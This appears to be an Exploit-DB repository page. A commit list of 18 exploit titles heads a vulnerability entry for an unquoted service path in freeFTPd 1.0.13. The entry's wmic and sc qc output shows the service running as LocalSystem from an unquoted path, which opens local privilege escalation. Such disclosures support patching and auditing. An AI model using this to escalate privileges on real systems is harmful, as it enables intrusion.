ea7a01d8fb
18 changes to exploits/shellcodes Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC) Sudo 1.8.25p - Buffer Overflow Torrent iPod Video Converter 1.51 - Stack Overflow DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path Disk Savvy Enterprise 12.3.18 - Unquoted Service Path Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow Sudo 1.8.25p - 'pwfeedback' Buffer Overflow OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution Microsoft SharePoint - Deserialization Remote Code Execution CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting WordPress InfiniteWP - Client Authentication Bypass (Metasploit)
24 lines
No EOL
1 KiB
Text
24 lines
No EOL
1 KiB
Text
Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
|
|
Exploit Author: boku
|
|
Date: 2020-02-10
|
|
Vendor Homepage: http://www.freesshd.com
|
|
Software Link: http://www.freesshd.com/freeFTPd.exe
|
|
Version: 1.0.13
|
|
Tested On: Windows 10 (32-bit)
|
|
|
|
C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
|
|
freeFTPdService C:\Program Files\freeSSHd\freeFTPdService.exe Auto
|
|
|
|
C:\Users\nightelf>sc qc freeFTPdService
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: freeFTPdService
|
|
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\freeSSHd\freeFTPdService.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : freeFTPdService
|
|
DEPENDENCIES : RPCSS
|
|
SERVICE_START_NAME : LocalSystem |